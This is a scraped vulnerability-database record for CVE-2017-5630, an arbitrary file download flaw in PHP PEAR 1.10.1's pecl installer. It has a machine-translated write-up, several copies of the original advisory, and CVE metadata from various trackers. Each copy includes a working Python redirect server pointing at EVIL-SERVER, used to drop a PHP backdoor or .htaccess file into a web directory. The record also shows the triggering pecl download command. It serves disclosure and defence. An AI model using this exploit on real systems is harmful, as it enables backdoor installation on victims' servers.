ID SSV:92633 Type seebug Reporter Root Modified 2017-02-01T00:00:00
Description
Author: mapl0
Vulnerability details
In the PEAR Base System The 1. 10. 1 version of the installer, can be in after the redirect does not verify file type and file name, and then allows the remote http server via a specially crafted request to overwrite the hacked server files, such as. htaccess is. When the attacker to run pecl download When you can trigger the vulnerability.
pear not because of the with original file names duplicate and rename the invalid file. Therefore, the attacker can overwrite the original file or the download of a backdoor, the premise is pecl the request is from web directories.
Moreover, the pecl are not deleted by this method to get the file, thus giving the attacker time in the file is noted before going to brute force the back door file.
POC Video: https://vimeo.com/201341280 The original version of you. https://pan.baidu.com/s/1dFaHTxZ Personal recording, the clarity is a bit poor
Point to prove:
This poc has three key points: First and foremost, the victim issued a pecl download command request. Then is the attacker the server receives a file download request. The last is a php Backdoor to be attacker to obtain.
1)The Victim Server attempts to download legitimate. tgz file.
pecl download http://VULN-SERVER:8080/Test.tgz
2)the attacker's server receives the test. tgz request and reply.
3) pecl unintentionally download a malicious php Backdoor
The attackers on the server run:
python-m SimpleHTTPServer 8888
python PECL-File-Exploit.py
import socket
HOST='localhost'
PORT=8080
TARGET='http://EVIL-SERVER:8888/'
FILE='. htaccess'
s = socket. socket()
s. bind((HOST, PORT))
s. listen(10)
print 'Waiting for PECL connections...'
while True:
conn, addr = s. accept()
junk = conn. recv(512)
conn. send('HTTP/1.1 302 Found\r\n')
conn. send('Location: '+TARGET+FILE+'\r\n')
conn. close()
s. close()
It will, incidentally, leave the back door download to the current directory File C:\xampp\htdocs\webapp\Evil.php downloaded
Personal summary: the exploit conditions there are harsh, need to be the attacker active in the web directory of running perl, and the target url need to be the attacker's server. However, the vulnerability to be used on a social networking site phishing, the danger is also great.
Disclosure Timeline:
Vendor Notification: January 11, 2017
Informed "PECL package no longer maintained" on : January 23, 2017
{"type": "seebug", "lastseen": "2017-11-19T12:02:10", "href": "https://www.seebug.org/vuldb/ssvid-92633", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "modified": "2017-02-01T00:00:00", "reporter": "Root", "description": "Author: **mapl0**\n\n### Vulnerability details\n\nIn the PEAR Base System The 1. 10. 1 version of the installer, can be in after the redirect does not verify file type and file name, and then allows the remote http server via a specially crafted request to overwrite the hacked server files, such as. htaccess is. When the attacker to run pecl download When you can trigger the vulnerability.\n\npear not because of the with original file names duplicate and rename the invalid file. Therefore, the attacker can overwrite the original file or the download of a backdoor, the premise is pecl the request is from web directories.\n\nMoreover, the pecl are not deleted by this method to get the file, thus giving the attacker time in the file is noted before going to brute force the back door file.\n\nPOC Video: https://vimeo.com/201341280 The original version of you. https://pan.baidu.com/s/1dFaHTxZ Personal recording, the clarity is a bit poor\n\n### Point to prove:\n\nThis poc has three key points: First and foremost, the victim issued a pecl download command request. Then is the attacker the server receives a file download request. The last is a php Backdoor to be attacker to obtain.\n\n1)The Victim Server attempts to download legitimate. tgz file.\n\npecl download http://VULN-SERVER:8080/Test.tgz\n\n2)the attacker's server receives the test. tgz request and reply.\n\n3) pecl unintentionally download a malicious php Backdoor\n\nThe attackers on the server run:\n\npython-m SimpleHTTPServer 8888\n\npython PECL-File-Exploit.py\n \n \n import socket\n \n HOST='localhost'\n PORT=8080\n TARGET='http://EVIL-SERVER:8888/'\n FILE='. htaccess'\n s = socket. socket()\n s. bind((HOST, PORT))\n s. listen(10)\n \n print 'Waiting for PECL connections...'\n \n \n while True:\n conn, addr = s. accept()\n junk = conn. recv(512)\n conn. send('HTTP/1.1 302 Found\\r\\n')\n conn. send('Location: '+TARGET+FILE+'\\r\\n')\n conn. close()\n s. close()\n \n\nWhen the attacked server to download the file:\n\nC:\\xampp\\htdocs\\webapp>pecl download http://VULN-SERVER:8080/Test.tgz\n\ndownloading Evil.php ... Starting to download Evil.php (4,665 bytes) ..... done: 4,665 bytes\n\nIt will, incidentally, leave the back door download to the current directory File C:\\xampp\\htdocs\\webapp\\Evil.php downloaded\n\n**Personal summary**: the exploit conditions there are harsh, need to be the attacker active in the web directory of running perl, and the target url need to be the attacker's server. However, the vulnerability to be used on a social networking site phishing, the danger is also great.\n\n### Disclosure Timeline:\n\n * Vendor Notification: January 11, 2017\n * Informed \"PECL package no longer maintained\" on : January 23, 2017\n * Opened Bug #2117 : January 25, 2017\n * January 29, 2017 : Public Disclosure\n\nReferences: https://www.exploit-db.com/exploits/41185/\n", "bulletinFamily": "exploit", "references": [], "viewCount": 2, "status": "cve,details", "sourceHref": "", "cvelist": ["CVE-2017-5630"], "enchantments_done": [], "title": "PHP PEAR 1.10.1 - arbitrary File Download Vulnerability (CVE-2017-5630)", "id": "SSV:92633", "sourceData": "", "published": "2017-02-01T00:00:00", "enchantments": {"score": {"value": 5.8, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-5630"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-5630"]}, {"type": "exploitdb", "idList": ["EDB-ID:41185"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:CA435F4EAB73186D4BEF3DFB80CFBD8C"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:140796"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-5630"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-5630"]}, {"type": "zdt", "idList": ["1337DAY-ID-26851"]}], "rev": 4}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2017-5630"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-5630"]}, {"type": "exploitdb", "idList": ["EDB-ID:41185"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:CA435F4EAB73186D4BEF3DFB80CFBD8C"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:140796"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-5630"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-5630"]}, {"type": "zdt", "idList": ["1337DAY-ID-26851"]}]}, "exploitation": null, "vulnersScore": 5.8}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645509258}}
{"ubuntucve": [{"lastseen": "2021-11-22T21:44:15", "description": "PECL in the download utility class in the Installer in PEAR Base System\nv1.10.1 does not validate file types and filenames after a redirect, which\nallows remote HTTP servers to overwrite files via crafted responses, as\ndemonstrated by a .htaccess overwrite.\n\n#### Bugs\n\n * <http://pear.php.net/bugs/bug.php?id=21171>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | PEAR issues should go against php-pear as of xenial \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | PEAR/PECL appears to have no authenticity checks of any sort. As far as I can tell any malicious MITM can install whatever they want anyway. \n[leosilva](<https://launchpad.net/~leosilva>) | unfixed as of 2020-11-23\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2017-02-01T00:00:00", "type": "ubuntucve", "title": "CVE-2017-5630", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5630"], "modified": "2017-02-01T00:00:00", "id": "UB:CVE-2017-5630", "href": "https://ubuntu.com/security/CVE-2017-5630", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "zdt": [{"lastseen": "2018-02-09T07:15:08", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2017-01-30T00:00:00", "type": "zdt", "title": "PHP PEAR 1.10.1 - Arbitrary File Download Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5630"], "modified": "2017-01-30T00:00:00", "id": "1337DAY-ID-26851", "href": "https://0day.today/exploit/description/26851", "sourceData": "[+]#############################################################################################\r\n[+] Credits / Discovery: John Page AKA hyp3rlinx \r\n[+] Website: hyp3rlinx.altervista.org\r\n[+] Source: http://hyp3rlinx.altervista.org/advisories/PEAR-ARBITRARY-FILE-DOWNLOAD.txt\r\n[+] ISR: ApparitionSEC\r\n[+]#############################################################################################\r\n \r\n \r\n \r\nVendor:\r\n============\r\npear.php.net\r\n \r\n \r\n \r\nProduct:\r\n===================================\r\nPEAR Base System v1.10.1\r\nPEAR Installer's download utility\r\n \r\n \r\n \r\nVulnerability Type:\r\n=======================\r\nArbitrary File Download\r\n \r\n \r\n \r\nCVE Reference:\r\n==============\r\nCVE-2017-5630\r\n \r\n \r\n \r\nSecurity Issue:\r\n================\r\n \r\nThe download utility class in the Installer in PEAR Base System v1.10.1, does not validate file types and filenames after a redirect,\r\nwhich allows remote HTTP servers to overwrite files via crafted responses, as demonstrated by a .htaccess overwrite.\r\n \r\ne.g.\r\n \r\npecl download <http://some-vuln-server/file.tgz> \r\n \r\nPEAR does not rename the arbitrary invalid file to the originally requested (safe) filename.\r\nTherefore, attackers can overwrite files or download a backdoor if the PECL request is made from from web accesible directory etc..\r\n \r\nMoreover, PECL doesn't delete these invalid files upon download, giving the attacker time to exploit it if attackers\r\ncan force the HTTP connection to stay open, and before a \"invalid file message\" is noticed.\r\n \r\nPOC Video:\r\nhttps://vimeo.com/201341280\r\n \r\n \r\nProof of concept:\r\nThis POC involves 3 machines:\r\nFirst machine is victim making a PECL download command request\r\nSecond is the vuln server receiving the file download request\r\nThird is the malicious server hosting the PHP backdoor, .htaccess file etc.\r\n===========================================================================\r\n \r\n1) Victim machine attempts to download a legit \".tgz\" archive.\r\n \r\npecl download http://VULN-SERVER:8080/Test.tgz\r\n \r\n \r\n2) VULN-SERVER where the victim is requesting \"Test.tgz\", and attacker controls HTTP response.\r\n \r\n \r\n3) EVIL-SERVER where PECL follows and downloads 'unintended' Evil.php backdoor.\r\npython -m SimpleHTTPServer 8888\r\n \r\n \r\nOn VULN-SERVER run \"PECL-File-Exploit.py\"\r\n \r\npython PECL-File-Exploit.py \r\n \r\n \r\nimport socket\r\n \r\nHOST='localhost'\r\nPORT=8080\r\nTARGET='http://EVIL-SERVER:8888/'\r\nFILE='.htaccess'\r\ns = socket.socket()\r\ns.bind((HOST, PORT))\r\ns.listen(10)\r\n \r\nprint 'Waiting for PECL connections...'\r\n \r\n \r\nwhile True:\r\n conn, addr = s.accept()\r\n junk = conn.recv(512) \r\n conn.send('HTTP/1.1 302 Found\\r\\n')\r\n conn.send('Location: '+TARGET+FILE+'\\r\\n')\r\n conn.close()\r\ns.close()\r\n \r\n \r\n \r\nThen, make request for Test.tgz...\r\n \r\nC:\\xampp\\htdocs\\webapp>pecl download http://VULN-SERVER:8080/Test.tgz\r\n \r\ndownloading Evil.php ...\r\nStarting to download Evil.php (4,665 bytes)\r\n.....done: 4,665 bytes\r\nFile C:\\xampp\\htdocs\\webapp\\Evil.php downloaded\r\n \r\n \r\n \r\nDisclosure Timeline:\r\n=====================================\r\nVendor Notification: January 11, 2017\r\nInformed \"PECL package no longer maintained\" : January 23, 2017\r\nOpened Bug #2117 : January 25, 2017\r\nJanuary 29, 2017 : Public Disclosure\n\n# 0day.today [2018-02-09] #", "sourceHref": "https://0day.today/exploit/26851", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "redhatcve": [{"lastseen": "2021-09-02T22:51:28", "description": "A vulnerability was found in php-pear where if a malicious server responded to a pear\n#### Mitigation\n\nThis vulnerability only allows files in the current directory to be overwritten, so using `pear download` in a temporary directory effectively mitigates the risk of a dangerous file overwrite occurring. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2017-02-02T17:45:57", "type": "redhatcve", "title": "CVE-2017-5630", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5630"], "modified": "2020-04-09T01:07:40", "id": "RH:CVE-2017-5630", "href": "https://access.redhat.com/security/cve/cve-2017-5630", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2017-01-30T19:04:23", "description": "", "cvss3": {}, "published": "2017-01-29T00:00:00", "type": "packetstorm", "title": "PEAR Arbitrary File Download", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5630"], "modified": "2017-01-29T00:00:00", "id": "PACKETSTORM:140796", "href": "https://packetstormsecurity.com/files/140796/PEAR-Arbitrary-File-Download.html", "sourceData": "`[+]############################################################################################# \n[+] Credits / Discovery: John Page AKA hyp3rlinx \n[+] Website: hyp3rlinx.altervista.org \n[+] Source: \nhttp://hyp3rlinx.altervista.org/advisories/PEAR-ARBITRARY-FILE-DOWNLOAD.txt \n[+] ISR: ApparitionSEC \n[+]############################################################################################# \n \n \n \nVendor: \n============ \npear.php.net \n \n \n \nProduct: \n=================================== \nPEAR Base System v1.10.1 \nPEAR Installer's download utility \n \n \n \nVulnerability Type: \n======================= \nArbitrary File Download \n \n \n \nCVE Reference: \n============== \nCVE-2017-5630 \n \n \n \nSecurity Issue: \n================ \n \nThe download utility class in the Installer in PEAR Base System v1.10.1, \ndoes not validate file types and filenames after a redirect, \nwhich allows remote HTTP servers to overwrite files via crafted responses, \nas demonstrated by a .htaccess overwrite. \n \ne.g. \n \npecl download <http://some-vuln-server/file.tgz> \n \nPEAR does not rename the arbitrary invalid file to the originally requested \n(safe) filename. \nTherefore, attackers can overwrite files or download a backdoor if the PECL \nrequest is made from from web accesible directory etc.. \n \nMoreover, PECL doesn't delete these invalid files upon download, giving the \nattacker time to exploit it if attackers \ncan force the HTTP connection to stay open, and before a \"invalid file \nmessage\" is noticed. \n \nPOC Video: \nhttps://vimeo.com/201341280 \n \n \nProof of concept: \nThis POC involves 3 machines: \nFirst machine is victim making a PECL download command request \nSecond is the vuln server receiving the file download request \nThird is the malicious server hosting the PHP backdoor, .htaccess file etc. \n=========================================================================== \n \n1) Victim machine attempts to download a legit \".tgz\" archive. \n \npecl download http://VULN-SERVER:8080/Test.tgz \n \n \n2) VULN-SERVER where the victim is requesting \"Test.tgz\", and attacker \ncontrols HTTP response. \n \n \n3) EVIL-SERVER where PECL follows and downloads 'unintended' Evil.php \nbackdoor. \npython -m SimpleHTTPServer 8888 \n \n \nOn VULN-SERVER run \"PECL-File-Exploit.py\" \n \npython PECL-File-Exploit.py \n \n \nimport socket \n \nHOST='localhost' \nPORT=8080 \nTARGET='http://EVIL-SERVER:8888/' \nFILE='.htaccess' \ns = socket.socket() \ns.bind((HOST, PORT)) \ns.listen(10) \n \nprint 'Waiting for PECL connections...' \n \n \nwhile True: \nconn, addr = s.accept() \njunk = conn.recv(512) \nconn.send('HTTP/1.1 302 Found\\r\\n') \nconn.send('Location: '+TARGET+FILE+'\\r\\n') \nconn.close() \ns.close() \n \n \n \nThen, make request for Test.tgz... \n \nC:\\xampp\\htdocs\\webapp>pecl download http://VULN-SERVER:8080/Test.tgz \n \ndownloading Evil.php ... \nStarting to download Evil.php (4,665 bytes) \n.....done: 4,665 bytes \nFile C:\\xampp\\htdocs\\webapp\\Evil.php downloaded \n \n \n \nDisclosure Timeline: \n===================================== \nVendor Notification: January 11, 2017 \nInformed \"PECL package no longer maintained\" : January 23, 2017 \nOpened Bug #2117 : January 25, 2017 \nJanuary 29, 2017 : Public Disclosure \n \n \n \nNetwork Access: \n================ \nRemote \n \n \n \nSeverity: \n========= \nHigh \n \n \n \n[+] Disclaimer \nThe information contained within this advisory is supplied \"as-is\" with no \nwarranties or guarantees of fitness of use or otherwise. \nPermission is hereby granted for the redistribution of this advisory, \nprovided that it is not altered except by reformatting it, and \nthat due credit is given. Permission is explicitly given for insertion in \nvulnerability databases and similar, provided that due credit \nis given to the author. The author is not responsible for any misuse of the \ninformation contained herein and accepts no responsibility \nfor any damage caused by the use or misuse of this information. The author \nprohibits any malicious use of security related information \nor exploits by the author or elsewhere. \n \nhyp3rlinx \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/140796/PEAR-ARBITRARY-FILE-DOWNLOAD.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:40", "description": "\nPHP PEAR 1.10.1 - Arbitrary File Download", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2017-01-30T00:00:00", "title": "PHP PEAR 1.10.1 - Arbitrary File Download", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5630"], "modified": "2017-01-30T00:00:00", "id": "EXPLOITPACK:CA435F4EAB73186D4BEF3DFB80CFBD8C", "href": "", "sourceData": "[+]#############################################################################################\n[+] Credits / Discovery: John Page AKA hyp3rlinx\t\n[+] Website: hyp3rlinx.altervista.org\n[+] Source: http://hyp3rlinx.altervista.org/advisories/PEAR-ARBITRARY-FILE-DOWNLOAD.txt\n[+] ISR: ApparitionSEC\n[+]#############################################################################################\n\n\n\nVendor:\n============\npear.php.net\n\n\n\nProduct:\n===================================\nPEAR Base System v1.10.1\nPEAR Installer's download utility\n\n\n\nVulnerability Type:\n=======================\nArbitrary File Download\n\n\n\nCVE Reference:\n==============\nCVE-2017-5630\n\n\n\nSecurity Issue:\n================\n\nThe download utility class in the Installer in PEAR Base System v1.10.1, does not validate file types and filenames after a redirect,\nwhich allows remote HTTP servers to overwrite files via crafted responses, as demonstrated by a .htaccess overwrite.\n\ne.g.\n\npecl download <http://some-vuln-server/file.tgz> \n\nPEAR does not rename the arbitrary invalid file to the originally requested (safe) filename.\nTherefore, attackers can overwrite files or download a backdoor if the PECL request is made from from web accesible directory etc..\n\nMoreover, PECL doesn't delete these invalid files upon download, giving the attacker time to exploit it if attackers\ncan force the HTTP connection to stay open, and before a \"invalid file message\" is noticed.\n\nPOC Video:\nhttps://vimeo.com/201341280\n\n\nProof of concept:\nThis POC involves 3 machines:\nFirst machine is victim making a PECL download command request\nSecond is the vuln server receiving the file download request\nThird is the malicious server hosting the PHP backdoor, .htaccess file etc.\n===========================================================================\n\n1) Victim machine attempts to download a legit \".tgz\" archive.\n\npecl download http://VULN-SERVER:8080/Test.tgz\n\n\n2) VULN-SERVER where the victim is requesting \"Test.tgz\", and attacker controls HTTP response.\n\n\n3) EVIL-SERVER where PECL follows and downloads 'unintended' Evil.php backdoor.\npython -m SimpleHTTPServer 8888\n\n\nOn VULN-SERVER run \"PECL-File-Exploit.py\"\n\npython PECL-File-Exploit.py \n\n\nimport socket\n\nHOST='localhost'\nPORT=8080\nTARGET='http://EVIL-SERVER:8888/'\nFILE='.htaccess'\ns = socket.socket()\ns.bind((HOST, PORT))\ns.listen(10)\n\nprint 'Waiting for PECL connections...'\n\n\nwhile True:\n conn, addr = s.accept()\n junk = conn.recv(512) \n conn.send('HTTP/1.1 302 Found\\r\\n')\n conn.send('Location: '+TARGET+FILE+'\\r\\n')\n conn.close()\ns.close()\n\n\n\nThen, make request for Test.tgz...\n\nC:\\xampp\\htdocs\\webapp>pecl download http://VULN-SERVER:8080/Test.tgz\n\ndownloading Evil.php ...\nStarting to download Evil.php (4,665 bytes)\n.....done: 4,665 bytes\nFile C:\\xampp\\htdocs\\webapp\\Evil.php downloaded\n\n\n\nDisclosure Timeline:\n=====================================\nVendor Notification: January 11, 2017\nInformed \"PECL package no longer maintained\" : January 23, 2017\nOpened Bug #2117 : January 25, 2017\nJanuary 29, 2017 : Public Disclosure\n\n\n\nNetwork Access:\n================\nRemote\n\n\n\nSeverity:\n=========\nHigh\n\n\n\n[+] Disclaimer\nThe information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise.\nPermission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and\nthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit\nis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility\nfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information\nor exploits by the author or elsewhere.", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "debiancve": [{"lastseen": "2022-03-28T07:43:21", "description": "PECL in the download utility class in the Installer in PEAR Base System v1.10.1 does not validate file types and filenames after a redirect, which allows remote HTTP servers to overwrite files via crafted responses, as demonstrated by a .htaccess overwrite.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-02-01T23:59:00", "type": "debiancve", "title": "CVE-2017-5630", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5630"], "modified": "2017-02-01T23:59:00", "id": "DEBIANCVE:CVE-2017-5630", "href": "https://security-tracker.debian.org/tracker/CVE-2017-5630", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2022-03-23T17:54:29", "description": "PECL in the download utility class in the Installer in PEAR Base System v1.10.1 does not validate file types and filenames after a redirect, which allows remote HTTP servers to overwrite files via crafted responses, as demonstrated by a .htaccess overwrite.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-02-01T23:59:00", "type": "cve", "title": "CVE-2017-5630", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5630"], "modified": "2020-01-23T18:23:00", "cpe": ["cpe:/a:php:pear:1.10.1"], "id": "CVE-2017-5630", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5630", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:php:pear:1.10.1:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-04-12T02:03:06", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-01-30T00:00:00", "type": "exploitdb", "title": "PHP PEAR 1.10.1 - Arbitrary File Download", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["2017-5630", "CVE-2017-5630"], "modified": "2017-01-30T00:00:00", "id": "EDB-ID:41185", "href": "https://www.exploit-db.com/exploits/41185", "sourceData": "[+]#############################################################################################\r\n[+] Credits / Discovery: John Page AKA hyp3rlinx\t\r\n[+] Website: hyp3rlinx.altervista.org\r\n[+] Source: http://hyp3rlinx.altervista.org/advisories/PEAR-ARBITRARY-FILE-DOWNLOAD.txt\r\n[+] ISR: ApparitionSEC\r\n[+]#############################################################################################\r\n\r\n\r\n\r\nVendor:\r\n============\r\npear.php.net\r\n\r\n\r\n\r\nProduct:\r\n===================================\r\nPEAR Base System v1.10.1\r\nPEAR Installer's download utility\r\n\r\n\r\n\r\nVulnerability Type:\r\n=======================\r\nArbitrary File Download\r\n\r\n\r\n\r\nCVE Reference:\r\n==============\r\nCVE-2017-5630\r\n\r\n\r\n\r\nSecurity Issue:\r\n================\r\n\r\nThe download utility class in the Installer in PEAR Base System v1.10.1, does not validate file types and filenames after a redirect,\r\nwhich allows remote HTTP servers to overwrite files via crafted responses, as demonstrated by a .htaccess overwrite.\r\n\r\ne.g.\r\n\r\npecl download <http://some-vuln-server/file.tgz> \r\n\r\nPEAR does not rename the arbitrary invalid file to the originally requested (safe) filename.\r\nTherefore, attackers can overwrite files or download a backdoor if the PECL request is made from from web accesible directory etc..\r\n\r\nMoreover, PECL doesn't delete these invalid files upon download, giving the attacker time to exploit it if attackers\r\ncan force the HTTP connection to stay open, and before a \"invalid file message\" is noticed.\r\n\r\nPOC Video:\r\nhttps://vimeo.com/201341280\r\n\r\n\r\nProof of concept:\r\nThis POC involves 3 machines:\r\nFirst machine is victim making a PECL download command request\r\nSecond is the vuln server receiving the file download request\r\nThird is the malicious server hosting the PHP backdoor, .htaccess file etc.\r\n===========================================================================\r\n\r\n1) Victim machine attempts to download a legit \".tgz\" archive.\r\n\r\npecl download http://VULN-SERVER:8080/Test.tgz\r\n\r\n\r\n2) VULN-SERVER where the victim is requesting \"Test.tgz\", and attacker controls HTTP response.\r\n\r\n\r\n3) EVIL-SERVER where PECL follows and downloads 'unintended' Evil.php backdoor.\r\npython -m SimpleHTTPServer 8888\r\n\r\n\r\nOn VULN-SERVER run \"PECL-File-Exploit.py\"\r\n\r\npython PECL-File-Exploit.py \r\n\r\n\r\nimport socket\r\n\r\nHOST='localhost'\r\nPORT=8080\r\nTARGET='http://EVIL-SERVER:8888/'\r\nFILE='.htaccess'\r\ns = socket.socket()\r\ns.bind((HOST, PORT))\r\ns.listen(10)\r\n\r\nprint 'Waiting for PECL connections...'\r\n\r\n\r\nwhile True:\r\n conn, addr = s.accept()\r\n junk = conn.recv(512) \r\n conn.send('HTTP/1.1 302 Found\\r\\n')\r\n conn.send('Location: '+TARGET+FILE+'\\r\\n')\r\n 